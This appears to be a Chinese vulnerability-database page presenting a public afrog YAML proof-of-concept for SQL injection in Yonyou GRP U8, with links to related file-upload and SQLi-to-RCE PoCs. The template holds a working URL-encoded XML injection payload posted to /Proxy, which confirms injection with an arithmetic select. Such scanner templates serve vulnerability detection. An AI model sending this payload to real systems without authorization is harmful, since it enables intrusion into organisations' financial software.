yonyou-grp-u8-sqli: Yonyou Grp U8 sqli

日期: 2025-09-01 | 影响软件: yonyou grp u8 | POC: 已公开

漏洞描述

yonyou grp u8 SQL注入漏洞

PoC代码[已公开]

id: yonyou-grp-u8-sqli

info:
    name: Yonyou Grp U8 sqli
    author: 凉风(http://webkiller.cn/)
    severity: high
    description: yonyou grp u8 SQL注入漏洞
    reference:
        - https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html

set:
    r1: randomInt(40000, 44800)
    r2: randomInt(40000, 44800)
rules:
    r0:
        request:
            method: POST
            path: /Proxy
            body: |
                cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{r1}}%2a{{r2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-sqli.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

yonyou-grp-u8-fileupload: 用友 GRP U8 FileUpload存在任意文件上传漏洞 POC

yonyou-grp-u8-selectdmje-jsp-sqli: 用友GRP-U8 selectdmje.jsp 存在sql注入漏洞 POC

yonyou-grp-u8-sqli-to-rce: Yonyou Grp U8 sqli to rce POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC